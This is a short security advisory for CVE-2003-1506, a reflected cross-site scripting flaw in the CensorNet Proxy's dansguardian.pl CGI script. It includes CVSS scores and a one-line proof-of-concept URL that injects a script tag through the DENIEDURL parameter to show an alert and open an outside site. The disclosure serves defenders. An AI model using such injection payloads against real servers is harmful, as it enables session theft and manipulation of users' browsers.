CensorNet: Cross Site Scripting Vulnerability

2007.10.25

Credit: Richard Maudsley

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2003-1506

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Hello,

A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and html) to be passed to the
cgi script and displayed in the web browser.

Exploit:
http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Count
er-Strike__servers__from__?10_per_month!');window.open("http://www.socke
tx.co.uk")</script>

Regards,
	Richard Maudsley

- -------------------------------------------------------------------
    This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for complaint regarding the
       content of this email please contact abuse (at) rbwm (dot) org [email concealed]
- -------------------------------------------------------------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CensorNet: Cross Site Scripting Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.